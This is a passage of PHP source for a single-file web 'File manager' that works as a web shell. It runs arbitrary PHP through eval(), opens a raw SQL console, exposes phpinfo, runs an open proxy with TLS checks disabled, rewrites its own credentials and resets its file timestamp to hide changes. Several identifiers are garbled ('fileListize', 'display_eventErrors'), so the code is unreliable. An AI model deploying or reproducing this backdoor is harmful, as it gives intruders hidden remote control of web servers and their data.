	                    	                    } elseif (($perms & 0x8000) == 0x8000) {

	                    	                    	                    //Regular

	                    	                    	                    $info = '-';

	                    	                    } elseif (($perms & 0x6000) == 0x6000) {

	                    	                    	                    //Block special

	                    	                    	                    $info = 'b';

	                    	                    } elseif (($perms & 0x4000) == 0x4000) {
               
	                    	                    	                    //Directory

	                    	                    	                    $info = 'd';

	                    	                    } elseif (($perms & 0x2000) == 0x2000) {

	                    	                    	                    //Character special
	                    	                    	                    $info = 'c';

	                    	                    } elseif (($perms & 0x1000) == 0x1000) {

	                    	                    	                    //FIFO pipe
              
	                    	                    	                    $info = 'p';
           
	                    	                    } else {
               
	                    	                    	                    //Unknown
        
	                    	                    	                    $info = 'u';

	                    	                    }
             
	                    }

  
                  
	                    //Owner
          
	                    $info .= (($perms & 0x0100) ? 'r' : '-');
                    
	                    $info .= (($perms & 0x0080) ? 'w' : '-');

	                    $info .= (($perms & 0x0040) ?

	                    (($perms & 0x0800) ? 's' : 'x' ) :

	                    (($perms & 0x0800) ? 'S' : '-'));

 

	                    //Group
	                    $info .= (($perms & 0x0020) ? 'r' : '-');
	                    $info .= (($perms & 0x0010) ? 'w' : '-');
	                    $info .= (($perms & 0x0008) ?
            
	                    (($perms & 0x0400) ? 's' : 'x' ) :

	                    (($perms & 0x0400) ? 'S' : '-'));
                    
 

	                    //World

	                    $info .= (($perms & 0x0004) ? 'r' : '-');
	                    $info .= (($perms & 0x0002) ? 'w' : '-');

	                    $info .= (($perms & 0x0001) ?

	                    (($perms & 0x0200) ? 't' : 'x' ) :

	                    (($perms & 0x0200) ? 'T' : '-'));
              


	                    return $info;

}


function fm_convert_rights($mode) {

	                    $mode = str_pad($mode,9,'-');
	                    $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');

	                    $mode = strtr($mode,$trans);
	                    $newmode = '0';

	                    $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 

	                    $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 

	                    $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 

	                    $newmode .= $owner . $group . $world;
	                    return intval($newmode, 8);
}


function fm_chmod($file, $val, $rec = false) {
	                    $res = @chmod(realpath($file), $val);
         
	                    if(@is_dir($file) && $rec){

	                    	                    $els = fm_scan_dir($file);
	                    	                    foreach ($els as $el) {

	                    	                    	                    $res = $res && fm_chmod($file . '/' . $el, $val, true);

	                    	                    }
            
	                    }
	                    return $res;

}


//load fileList

function fm_download($archiveFileName) {
    if (!empty($archiveFileName)) {

	                    	                    if (file_exists($archiveFileName)) {
          
	                    	                    	                    header("Content-Disposition: attachment; filename=" . basename($archiveFileName));   

	                    	                    	                    header("Content-Type: application/force-download");

	                    	                    	                    header("Content-Type: application/octet-stream");
                  
	                    	                    	                    header("Content-Type: application/download");
	                    	                    	                    header("Content-Description: File Transfer");            
	                    	                    	                    header("Content-Length: " . fileListize($archiveFileName));	                    	                    

	                    	                    	                    flush(); // this doesn't really matter.

	                    	                    	                    $fp = fopen($archiveFileName, "r");

	                    	                    	                    while (!feof($fp)) {

	                    	                    	                    	                    echo fread($fp, 65536);

	                    	                    	                    	                    flush(); // this is essential for large downloads

	                    	                    	                    } 
	                    	                    	                    fclose($fp);
         
	                    	                    	                    die();
                    
	                    	                    } else {

	                    	                    	                    header('HTTP/1.0 404 Not Found', true, 404);
           
	                    	                    	                    header('Status: 404 Not Found'); 

	                    	                    	                    die();

        }
                    
    } 
             
}



//show folder size

function fm_dir_size($f,$format=true) {
                
	                    if($format)  {

	                    	                    $size=fm_dir_size($f,false);
	                    	                    if($size<=1024) return $size.' bytes';

	                    	                    elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
               
	                    	                    elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';

	                    	                    elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
	                    	                    elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
	                    	                    else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	                    } else {

	                    	                    if(is_file($f)) return fileListize($f);

	                    	                    $size=0;

	                    	                    $dh=opendir($f);
	                    	                    while(($file=readdir($dh))!==false) {

	                    	                    	                    if($file=='.' || $file=='..') continue;

	                    	                    	                    if(is_file($f.'/'.$file)) $size+=fileListize($f.'/'.$file);

	                    	                    	                    else $size+=fm_dir_size($f.'/'.$file,false);
             
	                    	                    }
	                    	                    closedir($dh);
	                    	                    return $size+fileListize($f); 
           
	                    }
}


                 
//scan directory

function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
          
	                    $dir = $ndir = array();
          
	                    if(!empty($exp)){
                 
	                    	                    $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	                    }
	                    if(!empty($type) && $type !== 'all'){

	                    	                    $func = 'is_' . $type;
             
	                    }

	                    if(@is_dir($directory)){
                   
	                    	                    $fh = opendir($directory);
	                    	                    while (false !== ($filename = readdir($fh))) {
             
	                    	                    	                    if(substr($filename, 0, 1) != '.' || $do_not_filter) {

	                    	                    	                    	                    if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){

	                    	                    	                    	                    	                    $dir[] = $filename;
	                    	                    	                    	                    }
	                    	                    	                    }
              
	                    	                    }

	                    	                    closedir($fh);
             
	                    	                    natsort($dir);
	                    }
	                    return $dir;

}



function fm_link($get,$link,$name,$title='') {
               
	                    if (empty($title)) $title=$name.' '.basename($link);

	                    return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}



function fm_arr_to_option($arr,$n,$sel=''){

	                    foreach($arr as $v){

	                    	                    $b=$v[$n];

	                    	                    $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
        
	                    }
                   
	                    return $res;
                
}


function fm_lang_form ($current='en'){

return '

<form name="change_lang" method="post" action="">
	                    <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >

	                    	                    <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
	                    	                    <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
	                    	                    <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>

	                    	                    <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>

	                    	                    <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
              
	                    </select>

</form>

';
}

	                    

function fm_root($dirname){
         
	                    return ($dirname=='.' OR $dirname=='..');
                   
}
                 


function fm_php($string){
	                    $display_eventErrors=ini_get('display_eventErrors');

	                    ini_set('display_eventErrors', '1');

	                    ob_start();
                  
	                    eval(trim($string));
	                    $text = ob_get_contents();
                   
	                    ob_end_clean();

	                    ini_set('display_eventErrors', $display_eventErrors);

	                    return $text;

}


//SHOW DATABASES
function fm_sql_connect(){

	                    global $fm_config;
	                    return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
                  
}


function fm_sql($query){

	                    global $fm_config;

	                    $query=trim($query);

	                    ob_start();

	                    $connection = fm_sql_connect();
                 
	                    if ($connection->connect_error) {

	                    	                    ob_end_clean();	                    

	                    	                    return $connection->connect_error;
	                    }
	                    $connection->set_charset('utf8');

    $queried = mysqli_query($connection,$query);
            
	                    if ($queried===false) {

	                    	                    ob_end_clean();	                    

	                    	                    return mysqli_error($connection);

    } else {

	                    	                    if(!empty($queried)){

	                    	                    	                    while($row = mysqli_fetch_assoc($queried)) {

	                    	                    	                    	                    $query_result[]=  $row;
	                    	                    	                    }

	                    	                    }

	                    	                    $vdump=empty($query_result)?'':var_export($query_result,true);	                    
	                    	                    ob_end_clean();	                    

	                    	                    $connection->close();

	                    	                    return '<pre>'.stripslashes($vdump).'</pre>';

	                    }
}

         
function fm_backup_tables($tables = '*', $full_backup = true) {

	                    global $path;

	                    $mysqldb = fm_sql_connect();

	                    $delimiter = "; \n  \n";

	                    if($tables == '*')	                    {
	                    	                    $tables = array();

	                    	                    $result = $mysqldb->query('SHOW TABLES');
                    
	                    	                    while($row = mysqli_fetch_row($result))	                    {

	                    	                    	                    $tables[] = $row[0];

	                    	                    }

	                    } else {
	                    	                    $tables = is_array($tables) ? $tables : explode(',',$tables);
	                    }

    
                 
	                    $return='';
                  
	                    foreach($tables as $table)	                    {

	                    	                    $result = $mysqldb->query('SELECT * FROM '.$table);
	                    	                    $num_fields = mysqli_num_fields($result);

	                    	                    $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
	                    	                    $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));

	                    	                    $return.=$row2[1].$delimiter;

        if ($full_backup) {

	                    	                    for ($i = 0; $i < $num_fields; $i++)  {
        
	                    	                    	                    while($row = mysqli_fetch_row($result)) {

	                    	                    	                    	                    $return.= 'INSERT INTO `'.$table.'` VALUES(';

	                    	                    	                    	                    for($j=0; $j<$num_fields; $j++)	                    {

	                    	                    	                    	                    	                    $row[$j] = addslashes($row[$j]);

	                    	                    	                    	                    	                    $row[$j] = str_replace("\n","\\n",$row[$j]);
                    
	                    	                    	                    	                    	                    if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
	                    	                    	                    	                    	                    if ($j<($num_fields-1)) { $return.= ','; }

	                    	                    	                    	                    }
              
	                    	                    	                    	                    $return.= ')'.$delimiter;

	                    	                    	                    }

	                    	                      }
              
	                    	                    } else { 
               
	                    	                    $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);

	                    	                    }

	                    	                    $return.="\n\n\n";

	                    }


	                    //save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	                    $handle = fopen($file,'w+');
	                    fwrite($handle,$return);

	                    fclose($handle);

	                    $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';

    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}


function fm_restore_tables($sqlFileToExecute) {
         
	                    $mysqldb = fm_sql_connect();
	                    $delimiter = "; \n  \n";

    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");

    $sqlFile = fread($f,fileListize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	                    

    //Process the sql file by statements
           
    foreach ($sqlArray as $stmt) {

        if (strlen($stmt)>3){

	                    	                    	                    $result = $mysqldb->query($stmt);
	                    	                    	                    	                    if (!$result){

	                    	                    	                    	                    	                    $sqlErrorCode = mysqli_errno($mysqldb->connection);
                    
	                    	                    	                    	                    	                    $sqlErrorText = mysqli_error($mysqldb->connection);
	                    	                    	                    	                    	                    $sqlStmt      = $stmt;
         
	                    	                    	                    	                    	                    break;
           	                         }
           	                      }

           }

if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;

}


function fm_img_link($filename){

	                    return './'.basename(__FILE__).'?img='.base64_encode($filename);
}


function fm_home_style(){
	                    return '

input, input.fm_input {

	                    text-indent: 2px;
}



input, textarea, select, input.fm_input {

	                    color: black;
	                    font: normal 8pt Verdana, Arial, Helvetica, sans-serif;

	                    border-color: black;

	                    background-color: #FCFCFC none !important;
            
	                    border-radius: 0;

	                    padding: 2px;
}
               

          
input.fm_input {

	                    background: #FCFCFC none !important;
	                    cursor: pointer;

}


.home {
	                    background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");

	                    background-repeat: no-repeat;

}';

}


function fm_config_checkbox_row($name,$value) {

	                    global $fm_config;

	                    return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';

}

           
function fm_protocol() {

	                    if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';

	                    if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';

	                    if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';

	                    if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	                    return 'http://';
}


               
function fm_site_url() {
	                    return fm_protocol().$_SERVER['HTTP_HOST'];

}



function fm_url($full=false) {
	                    $host=$full?fm_site_url():'.';

	                    return $host.'/'.basename(__FILE__);
          
}
             

                   
function fm_home($full=false){
              
	                    return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
                  
}
               

                  
function fm_run_input($lng) {

	                    global $fm_config;

	                    $return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	                    '

	                    	                    	                    	                    <form  method="post" action="'.fm_url().'" style="display:inline">

	                    	                    	                    	                    <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
	                    	                    	                    	                    </form>
                   
' : '';
                    
	                    return $return;
        
}
                    


function fm_url_proxy($matches) {
	                    $link = str_replace('&amp;','&',$matches[2]);
	                    $url = isset($_GET['url'])?$_GET['url']:'';
	                    $parse_url = parse_url($url);

	                    $host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
            
	                    if (substr($link,0,2)=='//') {
	                    	                    $link = substr_replace($link,fm_protocol(),0,2);
                   
	                    } elseif (substr($link,0,1)=='/') {
                
	                    	                    $link = substr_replace($link,$host,0,1);	                    
                   
	                    } elseif (substr($link,0,2)=='./') {

	                    	                    $link = substr_replace($link,$host,0,2);	                    
                   
	                    } elseif (substr($link,0,4)=='http') {

	                    	                    //alles machen wunderschon
          
	                    } else {
          
	                    	                    $link = $host.$link;

	                    } 

	                    if ($matches[1]=='href' && !strripos($link, 'css')) {

	                    	                    $base = fm_site_url().'/'.basename(__FILE__);
                    
	                    	                    $baseq = $base.'?proxy=true&url=';

	                    	                    $link = $baseq.urlencode($link);
	                    } elseif (strripos($link, 'css')){
	                    	                    //как-то тоже подменять надо
              
	                    }

	                    return $matches[1].'="'.$link.'"';

}
                    
 

function fm_tpl_form($lng_tpl) {
	                    global ${$lng_tpl.'_templates'};
	                    $tpl_arr = json_decode(${$lng_tpl.'_templates'},true);

	                    $str = '';

	                    foreach ($tpl_arr as $ktpl=>$vtpl) {
        
	                    	                    $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	                    }
return '

<table>
        
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>

<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>

'.$str.'

<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>

</form>

<form method="post" action="">

<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
                
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
                  
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
                   
</form>
              
</table>
                
';

}


        
function find_text_in_fileList($dir, $mask, $text) {
                
    $results = array();
    if ($handle = opendir($dir)) {

        while (false !== ($entry = readdir($handle))) {

            if ($entry != "." && $entry != "..") {

                $path = $dir . "/" . $entry;

                if (is_dir($path)) {

                    $results = array_merge($results, find_text_in_fileList($path, $mask, $text));

                } else {

                    if (fnmatch($mask, $entry)) {

                        $contents = file_get_contents($path);
            
                        if (strpos($contents, $text) !== false) {
                 
                            $results[] = str_replace('//', '/', $path);

                        }
                
                    }
                }

            }

        }

        closedir($handle);

    }
    return $results;

}
             


               
/* End Functions */
                    

// authorization

if ($auth_ok['authorize']) {
	                    if (isset($_POST['login']) && isset($_POST['password'])){
	                    	                    if (($_POST['login']==$auth_ok['login']) && ($_POST['password']==$auth_ok['password'])) {

	                    	                    	                    setcookie($auth_ok['cookie_name'], $auth_ok['login'].'|'.md5($auth_ok['password']), time() + (86400 * $auth_ok['days_authorization']));

	                    	                    	                    $_COOKIE[$auth_ok['cookie_name']]=$auth_ok['login'].'|'.md5($auth_ok['password']);
	                    	                    }
                 
	                    }
	                    if (!isset($_COOKIE[$auth_ok['cookie_name']]) OR ($_COOKIE[$auth_ok['cookie_name']]!=$auth_ok['login'].'|'.md5($auth_ok['password']))) {

	                    	                    echo '

<!doctype html>
<html>

<head>
                  
<meta charset="utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<title>'.__('File manager').'</title>

</head>

<body>
<form action="" method="post">

'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;

'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
              
<input type="submit" value="'.__('Enter').'" class="fm_input">

</form>

'.fm_lang_form($language).'
               
</body>
</html>

';  
        
die();

	                    }
	                    if (isset($_POST['quit'])) {
           
	                    	                    unset($_COOKIE[$auth_ok['cookie_name']]);

	                    	                    setcookie($auth_ok['cookie_name'], '', time() - (86400 * $auth_ok['days_authorization']));

	                    	                    header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	                    }
         
}


// Change config

if (isset($_GET['fm_settings'])) {
	                    if (isset($_GET['fm_config_delete'])) { 
             
	                    	                    unset($_COOKIE['fm_config']);

	                    	                    setcookie('fm_config', '', time() - (86400 * $auth_ok['days_authorization']));

	                    	                    header('Location: '.fm_url().'?fm_settings=true');

	                    	                    exit(0);
	                    }	                    elseif (isset($_POST['fm_config'])) { 

	                    	                    $fm_config = $_POST['fm_config'];
	                    	                    setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth_ok['days_authorization']));
	                    	                    $_COOKIE['fm_config'] = serialize($fm_config);
	                    	                    $msg_mx = __('Settings').' '.__('done');
                    
	                    }	                    elseif (isset($_POST['fm_login'])) { 
            
	                    	                    if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];

	                    	                    $fm_login = json_encode($_POST['fm_login']);
                 
	                    	                    $fgc_real = file_get_contents(__FILE__);
	                    	                    $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc_real, $matches);

	                    	                    if (!empty($matches[1])) {

	                    	                    	                    $filemtime = filemtime(__FILE__);

	                    	                    	                    $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc_real);
                   
	                    	                    	                    if (file_put_contents(__FILE__, $replace)) {

	                    	                    	                    	                    $msg_mx .= __('File updated');
	                    	                    	                    	                    if ($_POST['fm_login']['login'] != $auth_ok['login']) $msg_mx .= ' '.__('Login').': '.$_POST['fm_login']['login'];
                
	                    	                    	                    	                    if ($_POST['fm_login']['password'] != $auth_ok['password']) $msg_mx .= ' '.__('Password').': '.$_POST['fm_login']['password'];
	                    	                    	                    	                    $auth_ok = $_POST['fm_login'];

	                    	                    	                    }

	                    	                    	                    else $msg_mx .= __('Error occurred');

	                    	                    	                    if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	                    	                    }
                  
	                    } elseif (isset($_POST['tpl_edited'])) { 
	                    	                    $lng_tpl = $_POST['tpl_edited'];

	                    	                    if (!empty($_POST[$lng_tpl.'_name'])) {
	                    	                    	                    $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
	                    	                    } elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
                    
	                    	                    	                    $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);

	                    	                    }

	                    	                    if (!empty($fm_php)) {

	                    	                    	                    $fgc_real = file_get_contents(__FILE__);

	                    	                    	                    $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc_real, $matches);
                    
	                    	                    	                    if (!empty($matches[1])) {

	                    	                    	                    	                    $filemtime = filemtime(__FILE__);

	                    	                    	                    	                    $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc_real);

	                    	                    	                    	                    if (file_put_contents(__FILE__, $replace)) {
	                    	                    	                    	                    	                    ${$lng_tpl.'_templates'} = $fm_php;
             
	                    	                    	                    	                    	                    $msg_mx .= __('File updated');

	                    	                    	                    	                    } else $msg_mx .= __('Error occurred');

	                    	                    	                    	                    if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	                    	                    	                    }	                    

	                    	                    } else $msg_mx .= __('Error occurred');

	                    }

}


// Just show image
if (isset($_GET['img'])) {
                    
	                    $file=base64_decode($_GET['img']);

	                    if ($info=getimagesize($file)){
	                    	                    switch  ($info[2]){	                    //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP

	                    	                    	                    case 1: $ext='gif'; break;

	                    	                    	                    case 2: $ext='jpeg'; break;
	                    	                    	                    case 3: $ext='png'; break;
	                    	                    	                    case 6: $ext='bmp'; break;

	                    	                    	                    default: die();

	                    	                    }

	                    	                    header("Content-type: image/$ext");
	                    	                    echo file_get_contents($file);
	                    	                    die();
                    
	                    }

}

// Just download file
if (isset($_GET['download'])) {
                
	                    $file=base64_decode($_GET['download']);

	                    fm_download($file);	                    

}


// La seguridad es fundamental en este tipo de programas, garantizando la privacidad de los archivos

if (isset($_GET['phpinfo'])) {
	                    phpinfo(); 

	                    die();

}
            

         
// Mini proxy, many bugs!

if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {

	                    $url = isset($_GET['url'])?urldecode($_GET['url']):'';
                  
	                    $proxy_form = '

<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">

	                    <form action="" method="GET">
	                    <input type="hidden" name="proxy" value="true">

	                    '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">

	                    <input type="submit" value="'.__('Show').'" class="fm_input">

	                    </form>
                 
</div>
                 
';

	                    if ($url) {

	                    	                    $ch = curl_init($url);
                   
	                    	                    curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
                
	                    	                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

	                    	                    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
	                    	                    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
	                    	                    curl_setopt($ch, CURLOPT_HEADER, 0);

	                    	                    curl_setopt($ch, CURLOPT_REFERER, $url);

	                    	                    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
	                    	                    $result = curl_exec($ch);

	                    	                    curl_close($ch);
	                    	                    //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);

	                    	                    $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);

	                    	                    $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
        
	                    	                    echo $result;
             
	                    	                    die();
	                    } 

}

?>

<!doctype html>

<html>

<head>     

	                    <meta charset="utf-8" />
               
	                    <meta name="viewport" content="width=device-width, initial-scale=1" />

    <title><?=__('File manager')?></title>
<style>

body {
           
	                    background-color:	                    white;
	                    font-family:	                    	                    Verdana, Arial, Helvetica, sans-serif;

	                    font-size:	                    	                    	                    8pt;

	                    margin:	                    	                    	                    	                    0px;

}
         


a:link, a:active, a:visited { color: #006699; text-decoration: none; }
             
a:hover { color: #DD6900; text-decoration: underline; }

a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }



table.bg {
             
	                    background-color: #ACBBC6

}


           
th, td { 
	                    font:	                    normal 8pt Verdana, Arial, Helvetica, sans-serif;

	                    padding: 3px;
}

th	                    {

	                    height:	                    	                    	                    	                    25px;
            
	                    background-color:	                    #006699;

	                    color:	                    	                    	                    	                    #FFA34F;
           
	                    font-weight:	                    	                    bold;
	                    font-size:	                    	                    	                    11px;
}



.row1 {

	                    background-color:	                    #EFEFEF;

}


.row2 {

	                    background-color:	                    #DEE3E7;

}

          
.row3 {
            
	                    background-color:	                    #D1D7DC;
	                    padding: 5px;
}


                  
tr.row1:hover {

	                    background-color:	                    #F3FCFC;
            
}


tr.row2:hover {

	                    background-color:	                    #F0F6F6;

}



.whole {

	                    width: 100%;

}


                    
.all tbody td:first-child{width:100%;}
           

textarea {
	                    font: 9pt 'Courier New', courier;

	                    line-height: 125%;
	                    padding: 5px;

}


.textarea_input {
                  
	                    height: 1em;
                  
}



.textarea_input:focus {

	                    height: auto;
}



input[type=submit]{

	                    background: #FCFCFC none !important;

	                    cursor: pointer;
}



.folder {
         
